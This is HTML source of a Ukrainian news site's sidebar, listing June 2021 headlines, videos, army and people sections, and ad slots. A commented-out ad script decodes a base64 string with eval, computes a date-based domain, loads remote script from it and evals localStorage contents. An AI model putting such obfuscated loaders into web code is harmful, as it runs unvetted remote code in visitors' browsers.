	<!-- <p>В данный момент Вы читаете новость "Украинская &#171;Мрия&#187; снесла ограждение на британской авиабазе (ВИДЕО)". Вас также, возможно, заинтересуют другие последние <a style="color: #336699;text-decoration: underline;" href="https://enovosty.com/news">новости</a> Украины и мира на enovosty.com</p> -->
</div>


<br />


<!-- /17774365/enovosty.com_300x600 -->
<div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px;'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });
</script>
</div>
<br>

	
	<div id='admixer_f1971219dfb645c1a3626879325bc045_zone_45971_sect_1082_site_1069' data-sender='admixer'></div>
	<script type='text/javascript'>
		(window.globalAmlAds = window.globalAmlAds || []).push(function() {
	globalAml.display('admixer_f1971219dfb645c1a3626879325bc045_zone_45971_sect_1082_site_1069');
	});
	</script>
	
	



<br />


 

<div class="mainPageWiget articles" style="overflow:visible;">
	<p style="height: auto;overflow: visible; font-weight: 700;font-family: arial,verdana,tahoma;margin: 0;">
	<img src="https://enovosty.com/wp-content/themes/eizvestia/img/en_analitics.jpg" style="margin-right: 5px;margin-bottom: -2px;">
	<a style="color:#000;font-size: 16px;" href="https://enovosty.com/articles">Аналитика</a></p>
	<hr style="border: 1px solid #000000;">
					<div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4852788">
					<div class="blockTitle" style="margin:4px 0;">
													<img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" />
												<a class="postTitle" href="https://enovosty.com/politika/full/2506-incident-s-britanskim-esmincem-v-chernom-more-pochemu-kreml-xochet-sorvat-voennye-ucheniya-see-breeze-2021">Инцидент с британским эсминцем в Черном море: Почему Кремль хочет сорвать военные учения «See Breeze – 2021»</a>
						<!-- <span class="posthi">25&#160;июня,&#160;09:27</span> -->
					</div>
									</div>
							<div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4852231">
					<div class="blockTitle" style="margin:4px 0;">
													<img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" />
												<a class="postTitle" href="https://enovosty.com/finance/full/2206-nulevaya-deklaraciya-ze-vlast-zagonyaet-grazhdan-strany-v-dolgovuyu-yamu">Нулевая декларация: Зе-власть загоняет граждан страны в долговую яму</a>
						<!-- <span class="posthi">22&#160;июня,&#160;11:59</span> -->
					</div>
									</div>
							<div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4851985">
					<div class="blockTitle" style="margin:4px 0;">
													<img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" />
												<a class="postTitle" href="https://enovosty.com/finance/full/1906-obderut-na-prodazhe-kvartir-i-vydavyat-s-zemelnyx-nadelov">Обдерут на продаже квартир и выдавят с земельных наделов</a>
						<!-- <span class="posthi">19&#160;июня,&#160;20:54</span> -->
					</div>
									</div>
							<div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4851802">
					<div class="blockTitle" style="margin:4px 0;">
													<img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" />
												<a class="postTitle" href="https://enovosty.com/ekonomika/full/1806-rynok-zemli-po-ukrainski-kakie-riski-mogut-vozniknut-i-kak-ix-izbezhat">Рынок земли по-украински: какие риски могут возникнуть и как их избежать</a>
						<!-- <span class="posthi">18&#160;июня,&#160;12:22</span> -->
					</div>
									</div>
							<div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4851399">
					<div class="blockTitle" style="margin:4px 0;">
													<img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" />
												<a class="postTitle" href="https://enovosty.com/politika/full/1606-vladimir-fesenko-putin-prizval-vosprinimat-vserez-prizyvy-zelenskogo-prinyat-ukrainu-v-nato">Владимир Фесенко: Путин призвал воспринимать всерьез призывы Зеленского принять Украину в НАТО</a>
						<!-- <span class="posthi">16&#160;июня,&#160;08:27</span> -->
					</div>
									</div>
							<div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4850641">
					<div class="blockTitle" style="margin:4px 0;">
													<img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" />
												<a class="postTitle" href="https://enovosty.com/finance/full/1106-popadut-li-v-kaznu-ukrainy-nalogi-microsoft-google-i-facebook">Попадут ли в казну Украины налоги  Microsoft, Google и Facebook</a>
						<!-- <span class="posthi">11&#160;июня,&#160;18:13</span> -->
					</div>
									</div>
							<div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4849749">
					<div class="blockTitle" style="margin:4px 0;">
													<img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" />
												<a class="postTitle" href="https://enovosty.com/politika/full/606-zakon-o-deoligarxizacii-piarshou-ili-realnaya-borba">Закон о деолигархизации: пиаршоу или реальная борьба</a>
						<!-- <span class="posthi">06&#160;июня,&#160;16:25</span> -->
					</div>
									</div>
							<div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4849439">
					<div class="blockTitle" style="margin:4px 0;">
													<img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" />
												<a class="postTitle" href="https://enovosty.com/ekonomika/full/406-severnyj-potok-2-riski-i-posledstviya-dlya-ukrainy">«Северный поток-2»: риски и последствия для Украины</a>
						<!-- <span class="posthi">04&#160;июня,&#160;10:26</span> -->
					</div>
									</div>
							<div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4848821">
					<div class="blockTitle" style="margin:4px 0;">
													<img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" />
												<a class="postTitle" href="https://enovosty.com/society/full/106-pora-otdyxat-kak-i-gde-komfortno-i-bezopasno-provesti-otpusk-2021">Пора отдыхать: Как и где комфортно и безопасно провести отпуск-2021</a>
						<!-- <span class="posthi">01&#160;июня,&#160;12:33</span> -->
					</div>
									</div>
							<div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4848723">
					<div class="blockTitle" style="margin:4px 0;">
													<img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" />
												<a class="postTitle" href="https://enovosty.com/politika/full/3105-itogi-maya-unikalnyj-shans-dlya-ukrainy-bitva-za-kiev-i-shpionskie-strasti-v-evrope">Итоги мая: Уникальный шанс для Украины, битва за Киев и шпионские страсти в Европе</a>
						<!-- <span class="posthi">31&#160;мая,&#160;20:54</span> -->
					</div>
											<div class="more"><a href="https://enovosty.com/articles">Все статьи</a></div>
									</div>
			</div>

<br />




<script async src="//whhrux.com/8ny1l7192ivl0mp/y03h8q768vuq/678ypkeqn6.php"></script>
<div data-la-block="dc72cd02-a35e-4362-9683-673dfde66e41"></div>
<br>




 
 
<div id="pop_video" class="six">
	
			<p class="head"><span>популярные видео</span></p>
			<div class="caption" data-limit="6"> 
				<div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div>
				<div class="popular-sort">
					<div class="sort"><a onclick="getPopVideo(31)">месяц</a></div>
					<div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div>				
					<div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div>	
				</div>		
			</div>
		  			<table style="width:100%;" class="newsbody">
			<tr>				<td class="photo ">
					<div class="aimg">
													<a href="https://enovosty.com/news/zdorove/full/2306-kurez-kot-poluchil-nagonyaj-ot-koshki-za-chixanie-video">
								<img width="142" height="88" alt="Курьез: кот получил нагоняй от кошки за чихание" src="https://enovosty.com/wp-content/uploads/2021/06/941313.jpg" />
								<span class="stopbg"></span></a>
							
												<a class="title" href="https://enovosty.com/news/zdorove/full/2306-kurez-kot-poluchil-nagonyaj-ot-koshki-za-chixanie-video">Курьез: кот получил нагоняй от кошки за чихание</a>	
					</div>	
									</td>
								<td class="photo ">
					<div class="aimg">
													<a href="https://enovosty.com/news/news_abroad/full/2106-set-pokoril-medved-kotoryj-reshil-iskupatsya-v-detskom-bassejne-video">
								<img width="142" height="88" alt="Сеть покорил медведь, который решил искупаться в детском бассейне" src="https://enovosty.com/wp-content/uploads/2021/06/aux-head-1624267537-20210621_bear_360.jpg" />
								<span class="stopbg"></span></a>
							
												<a class="title" href="https://enovosty.com/news/news_abroad/full/2106-set-pokoril-medved-kotoryj-reshil-iskupatsya-v-detskom-bassejne-video">Сеть покорил медведь, который решил искупаться в детском бассейне</a>	
					</div>	
									</td>
								<td class="photo last">
					<div class="aimg">
													<a href="https://enovosty.com/news/news_society/full/2306-les-pod-xersonom-okkupirovali-ekzoticheskie-kaktusy-video">
								<img width="142" height="88" alt="Лес под Херсоном оккупировали экзотические кактусы" src="https://enovosty.com/wp-content/uploads/2021/06/screenshot_10-2.jpg" />
								<span class="stopbg"></span></a>
							
												<a class="title" href="https://enovosty.com/news/news_society/full/2306-les-pod-xersonom-okkupirovali-ekzoticheskie-kaktusy-video">Лес под Херсоном оккупировали экзотические кактусы</a>	
					</div>	
									</td>
				</tr><tr><td class="view"><span><i></i>4190</span></td><td class="view"><span><i></i>1992</span></td><td class="view last"><span><i></i>1964</span></td></tr><tr>				<td class="photo ">
					<div class="aimg">
													<a href="https://enovosty.com/news/news_incidents/full/2106-v-kieve-prorvalo-vodoprovod-video-s-mesta-chp">
								<img width="142" height="88" alt="В Киеве прорвало водопровод: видео с места ЧП" src="https://enovosty.com/wp-content/uploads/2021/06/screenshot_4-23.png" />
								<span class="stopbg"></span></a>
							
												<a class="title" href="https://enovosty.com/news/news_incidents/full/2106-v-kieve-prorvalo-vodoprovod-video-s-mesta-chp">В Киеве прорвало водопровод: видео с места ЧП</a>	
					</div>	
									</td>
								<td class="photo ">
					<div class="aimg">
													<a href="https://enovosty.com/news/news_abroad/full/2206-v-izraile-uspeshno-zavershili-pervye-ispytaniya-lazernogo-perexvata-bespilotnikov">
								<img width="142" height="88" alt="В Израиле успешно завершили первые испытания лазерного перехвата БПЛА" src="https://enovosty.com/wp-content/uploads/2021/06/640x480.jpg" />
								<span class="stopbg"></span></a>
							
												<a class="title" href="https://enovosty.com/news/news_abroad/full/2206-v-izraile-uspeshno-zavershili-pervye-ispytaniya-lazernogo-perexvata-bespilotnikov">В Израиле успешно завершили первые испытания лазерного перехвата БПЛА</a>	
					</div>	
									</td>
								<td class="photo last">
					<div class="aimg">
													<a href="https://enovosty.com/news/news_abroad/full/2206-na-plyazhe-v-ssha-naduli-gigantskij-mylnyj-puzyr-video">
								<img width="142" height="88" alt="На пляже в США надули гигантский мыльный пузырь" src="https://enovosty.com/wp-content/uploads/2021/06/screenshot_27-4.png" />
								<span class="stopbg"></span></a>
							
												<a class="title" href="https://enovosty.com/news/news_abroad/full/2206-na-plyazhe-v-ssha-naduli-gigantskij-mylnyj-puzyr-video">На пляже в США надули гигантский мыльный пузырь</a>	
					</div>	
									</td>
				</tr><tr><td class="view"><span><i></i>1762</span></td><td class="view"><span><i></i>1562</span></td><td class="view last"><span><i></i>1425</span></td></tr>			</table>
				<div class="more"><a href="https://enovosty.com/video">Все Видео</a></div>
		
		</div>
<br>

 




<div class="bannerB"><!-- <div id="adriver_banner_B4"></div> -->




<div id="phoenix57c02c9d4f32fe394547dcf1"></div> 
<script>
	var site_id = "57768bd94f32fe17ccf62bcc";
	var widget_id = "57c02c9d4f32fe394547dcf1";
</script>
<script src="//phoenix-widget.com/static/js/jsonp.js"></script>


</div>
<!--
<div id="MIXADV_6543" class="MIXADVERT_NET"></div>
<script>
var node6543 = document.getElementById("MIXADV_6543");
if( node6543 )
{
   var script = document.createElement("script");
   script.charset = "utf-8";
   script.src = "https://m.mixadvert.com/show/?id=6543&r="+Math.random();
   node6543.parentNode.appendChild(script);
   script.onerror = function(){
	  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY1NDMgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjU0My5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTY1NDMucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY1NDMuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY1NDMiKSkgfSwgNTAwMCk7ICA7fTsg") );
  }
}
</script>
-->

	<div class="wiget simple_pr" style="margin:0 0 10px;display:block; position:relative;" id="theme_posts">
		
				  <div class="caption "> 
						<p>Происшествия</p>
						<div class="popular-sort">
							<div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '4247', 4247, 15)">месяц</a></div>
							<div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '4247', 4247, 15)">неделю</a>&nbsp;&nbsp;|</div>				
							<div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '4247', 4247, 15)">сутки</a>&nbsp;&nbsp;|</div>				
						</div>	
				  </div>
				  <div class="newsbody">
				  <h3 class="press"><a href="https://enovosty.com/news/news_society/full/2106-gurzufu-i-plyazham-yalty-polnaya-xana-socseti-o-posledstviyax-krymskogo-navodneniya-foto">"Гурзуфу и пляжам Ялты - полная хана", — соцсети о последствиях крымского наводнения (ФОТО) (7011)</a></h3><h3 class="press"><a href="https://enovosty.com/news/news_incidents/full/1906-kontrabandisty-pytayutsya-vyvezti-iz-ukrainy-400-kg-aviacionnyx-vintov-video">Контрабандисты пытались вывезти из Украины 400 кг авиационных винтов (ВИДЕО) (3209)</a></h3><h3 class="press"><a href="https://enovosty.com/news/news_incidents/full/2606-dumal-proskochit-v-xarkovskoj-oblasti-mikroavtobus-popal-pod-poezd-foto-video">Думал проскочит: в Харьковской области микроавтобус попал под поезд. ФОТО , ВИДЕО (2116)</a></h3><h3 class="press"><a href="https://enovosty.com/news/news_incidents/full/2106-v-kieve-prorvalo-vodoprovod-video-s-mesta-chp">В Киеве прорвало водопровод: видео с места ЧП (1762)</a></h3><h3 class="press"><a href="https://enovosty.com/news/news_incidents/full/2506-sbu-razoblachila-agenta-rossijskix-specsluzhb">СБУ разоблачила агента российских спецслужб (1683)</a></h3><h3 class="press"><a href="https://enovosty.com/news/news_incidents/full/1906-iz-gazoprovoda-rossijskogo-gazproma-proizoshla-krupnejshaya-utechka-metana-gazovoe-oblako-obnaruzheno-iz-kosmosa-foto">Из газопровода российского "Газпрома" произошла крупнейшая утечка метана: газовое облако обнаружено спутником (ФОТО) (1528)</a></h3><h3 class="press"><a href="https://enovosty.com/news/news_society/full/1906-navodnenie-v-yalta-smylo-plyazhi-kurortnyj-gorod-lishilsya-pitevoj-vody-gaza-i-elektrichestva-foto-i-video">Наводнение в Ялте смыло пляжи. Курортный город лишился питьевой воды, газа и электричества (ФОТО и ВИДЕО) (1494)</a></h3><h3 class="press"><a href="https://enovosty.com/news/news_society/full/2006-v-yalte-70-krokodilov-vyrvalis-na-svobodu-posle-potopa-foto-i-video">В оккупированной Ялте 70 крокодилов вырвались на свободу после потопа (ФОТО и ВИДЕО) (1387)</a></h3><h3 class="press"><a href="https://enovosty.com/news/news_incidents/full/2506-v-chexii-moshhnejshij-tornado-srovnyal-s-zemlej-derevni">"Как на поле боя": в Чехии мощнейший торнадо сровнял с землей деревни (ВИДЕО) (997)</a></h3><h3 class="press"><a href="https://enovosty.com/news/news_incidents/full/2306-vojna-na-donbasse-vrag-atakoval-vsu-iz-vozduxa-a-utrom-udarili-iz-minometov">Война на Донбассе: Враг атаковал ВСУ из воздуха, а утром ударил из минометов (933)</a></h3></div> 
	</div>



				<div class="mainarmiya">
			<p><a style="font-size: 17px;" href="https://enovosty.com/armiya">Армия</a></p>
			<table style="width:100%;">
				<tr>
									<td style="width:24%;">
						<div style="border:none; padding-top:3px;" id="post-4363753">
							<a href="https://enovosty.com/armiya/full/565-granatomet-rpg-7" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/06/rpg_7-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" loading="lazy" srcset="https://enovosty.com/wp-content/uploads/2014/06/rpg_7-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/06/rpg_7-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/06/rpg_7.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a>
							<a class="postTitle" href="https://enovosty.com/armiya/full/565-granatomet-rpg-7" >Гранатомет РПГ-7</a>
						</div>
					</td>
				 					<td style="width:24%;">
						<div style="border:none; padding-top:3px;" id="post-4385524">
							<a href="https://enovosty.com/armiya/full/135-granatomet-at4-ssha-shveciya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/09/at4-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" loading="lazy" srcset="https://enovosty.com/wp-content/uploads/2014/09/at4-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/09/at4-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/09/at4.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a>
							<a class="postTitle" href="https://enovosty.com/armiya/full/135-granatomet-at4-ssha-shveciya" >Гранатомет AT4 (США-Швеция)</a>
						</div>
					</td>
				 					<td style="width:24%;">
						<div style="border:none; padding-top:3px;" id="post-4386609">
							<a href="https://enovosty.com/armiya/full/844-granatomet-mk-47-striker-ssha" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/09/Mk_47_Striker-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" loading="lazy" srcset="https://enovosty.com/wp-content/uploads/2014/09/Mk_47_Striker-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/09/Mk_47_Striker-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/09/Mk_47_Striker.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a>
							<a class="postTitle" href="https://enovosty.com/armiya/full/844-granatomet-mk-47-striker-ssha" >Гранатомет Mk 47 Striker (США)</a>
						</div>
					</td>
				 					<td style="width:24%;">
						<div style="border:none; padding-top:3px;" id="post-4497457">
							<a href="https://enovosty.com/armiya/full/555-boevoj-modul-shablya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2016/01/shablya-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" loading="lazy" srcset="https://enovosty.com/wp-content/uploads/2016/01/shablya-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2016/01/shablya-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2016/01/shablya.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a>
							<a class="postTitle" href="https://enovosty.com/armiya/full/555-boevoj-modul-shablya" >Боевой модуль "Шабля"</a>
						</div>
					</td>
				 				</tr>
			 </table>
			 <a href="https://enovosty.com/armiya" class="allarmiya">Вся армия&nbsp;&nbsp;&nbsp;&nbsp;>></a>
		 </div>
	
				<div class="mainperson">
			<p><a style="font-size: 17px;" href="https://enovosty.com/person">Персоны</a></p>
			<table style="width:100%;">
				<tr>
									<td style="width:24%;">
						<div style="border:none; padding-top:3px;" id="post-4301941">
							<a href="https://enovosty.com/person/full/338-timoshenko-yuliya" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/06/timoshenko-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" loading="lazy" srcset="https://enovosty.com/wp-content/uploads/2013/06/timoshenko-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/06/timoshenko.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a>
							<a class="postTitle" href="https://enovosty.com/person/full/338-timoshenko-yuliya" >Тимошенко<br /> Юлия</a>
						</div>
					</td>
				 					<td style="width:24%;">
						<div style="border:none; padding-top:3px;" id="post-4306032">
							<a href="https://enovosty.com/person/full/komarovskij-evgenij" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/07/komarovskiy-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" loading="lazy" srcset="https://enovosty.com/wp-content/uploads/2013/07/komarovskiy-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/07/komarovskiy.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a>
							<a class="postTitle" href="https://enovosty.com/person/full/komarovskij-evgenij" >Комаровский<br /> Евгений</a>
						</div>
					</td>
				 					<td style="width:24%;">
						<div style="border:none; padding-top:3px;" id="post-4368532">
							<a href="https://enovosty.com/person/full/487-tarasyuk-boris" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2014/06/tarasuk_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" loading="lazy" srcset="https://enovosty.com/wp-content/uploads/2014/06/tarasuk_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/06/tarasuk_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a>
							<a class="postTitle" href="https://enovosty.com/person/full/487-tarasyuk-boris" >Тарасюк<br /> Борис</a>
						</div>
					</td>
				 					<td style="width:24%;">
						<div style="border:none; padding-top:3px;" id="post-4644514">
							<a href="https://enovosty.com/person/full/2809-kolesnik_dmitriy" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2017/09/kolesnik-1-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" loading="lazy" srcset="https://enovosty.com/wp-content/uploads/2017/09/kolesnik-1-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2017/09/kolesnik-1.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a>
							<a class="postTitle" href="https://enovosty.com/person/full/2809-kolesnik_dmitriy" >Колесник<br /> Дмитрий</a>
						</div>
					</td>
				 				</tr>
			 </table>
			 <a href="https://enovosty.com/person" class="allperson">Все персоны&nbsp;&nbsp;&nbsp;&nbsp;>></a>
		 </div>
	

<div class="wiget simple_pr" id="pop_posts">
	
			  <div class="caption"> 
					<div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div>
					<div class="popular-sort">
						<div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div>
						<div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div>				
						<div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div>	
					</div>		
			  </div>
			  <div class="newsbody">
			  <p class="press"><a href="https://enovosty.com/news/news_society/full/2606-kurez-stado-dikix-kabanov-neozhidanno-nagryanulo-k-otdyxayushhix-turistam-na-plyazhe-video">Курьез: Стадо диких кабанов неожиданно нагрянуло к отдыхающих туристам на пляже (ВИДЕО) (3741)</a></p><p class="press"><a href="https://enovosty.com/news/news_society/full/2606-kak-vyglyadyat-ulicy-i-plyazhi-yalty-posle-zatopleniya-foto">Как выглядят улицы и пляжи Ялты после затопления. ФОТО (3588)</a></p><p class="press"><a href="https://enovosty.com/news/zdorove/full/2506-v-kieve-ustanovlen-temperaturnyj-rekord">В Киеве установлен новый температурный рекорд: такой жары не было с 19-го века (3128)</a></p><p class="press"><a href="https://enovosty.com/uk/news-ukr/news_politics-ukr/full/2506-lyubitel-epatazhu-lyashko-rozdyagnuvsya-u-pryamomu-efiri-video">Стриптиз від екснардепа: Любитель епатажу Ляшко роздягнувся у прямому ефірі (ВІДЕО) (2788)</a></p><p class="press"><a href="https://enovosty.com/news/news_incidents/full/2606-dumal-proskochit-v-xarkovskoj-oblasti-mikroavtobus-popal-pod-poezd-foto-video">Думал проскочит: в Харьковской области микроавтобус попал под поезд. ФОТО , ВИДЕО (2113)</a></p><p class="press"><a href="https://enovosty.com/news/news_abroad/full/2506-kurez-vo-francii-policiya-s-pomoshhyu-sachkov-vylavlivala-45-tysyach-evro-iz-fontana-foto">Курьез: во Франции полиция с помощью сачков вылавливала 45 тысяч евро из фонтана. ФОТО (2053)</a></p><p class="press"><a href="https://enovosty.com/uk/news-ukr/news_technology-ukr/full/2506-odnogo-dnya-ya-stanu-merom-u-klichka-zyavivsya-spivayachij-konkurent-video">"Одного дня я стану мером": У Кличка з'явився співаючий конкурент, мер записав відповідь у стилі реп (ВІДЕО) (1931)</a></p><p class="press"><a href="https://enovosty.com/news/news_abroad/full/2606-v-avguste-zhdet-katastrofa-glava-minfina-ssha-dopustila-vozmozhnost-defolta-ssha-po-gosudarstvennomu-dolgu">«В августе ждет катастрофа», - Глава Минфина США допустила возможность дефолта по государственному долгу (1725)</a></p><p class="press"><a href="https://enovosty.com/news/news_incidents/full/2506-sbu-razoblachila-agenta-rossijskix-specsluzhb">СБУ разоблачила агента российских спецслужб (1677)</a></p><p class="press"><a href="https://enovosty.com/news/news_society/full/2606-stoyat-v-probkax-prixoditsya-po-30-40-mintu-kak-ukraincy-dobirayutsya-na-otdyx-v-kirillovku-foto-video">Стоять в пробках приходится по 30-40 минту: как украинцы добираются на отдых в Кирилловку. ФОТО. ВИДЕО (1433)</a></p></div> 
</div>






</div>    
</div>
<style>#sidebarRight{margin-top:-227px;}</style>

<div id="sidebarRight"  >
<!-- begin right sidebar -->
<form method="get" id="searchform" action="https://enovosty.com/">
	<div class="search300">
        <input type="text" value="" name="s" id="s" />
        <input type="hidden" name="arh_title" value="on">
        <input type="hidden" name="arh_text" value="on">
        <input type="hidden" name="arh_news" value="on">
        <input type="hidden" name="arh_posts" value="on">
		<input type="submit" id="searchsubmit" value="Поиск" />
	</div>
</form>
<!-- inc banner c1 -->


		
<div class="wiget simple_pr socnet">
	<div class="caption"><p>Последние новости в соцсетях</p></div> 
	<table>
		<tr>
			<td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td>
			<td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td>
							
			<td><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" rel="nofollow" target="_blank" class="you_tube"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/You_Tube.png) no-repeat;"></i></a></td>	
			<td><a href="https://t.me/enovosty" rel="nofollow" target="_blank" class="telegram"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/Telegram1_Obem1.png) no-repeat;"></i></a></td>
		</tr>
	</table>
</div>
	
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- enovosty_300_600 -->
<ins class="adsbygoogle"
	 style="display:inline-block;width:300px;height:600px"
	 data-ad-client="ca-pub-1008673670491634"
	 data-ad-slot="9027886280"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>

	<div class="wiget simple_pr" style="margin-top:5px;">
		<div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/publications">Публикации</a></div></div> 
				<p class="press"><a href="https://enovosty.com/publications/full/2603-problemy-reformy-zdravooxraneniya-pochemu-vrachi-massovo-uezzhayut-iz-ukrainy">Проблемы реформы здравоохранения: почему врачи массово уезжают из Украины</a></p>
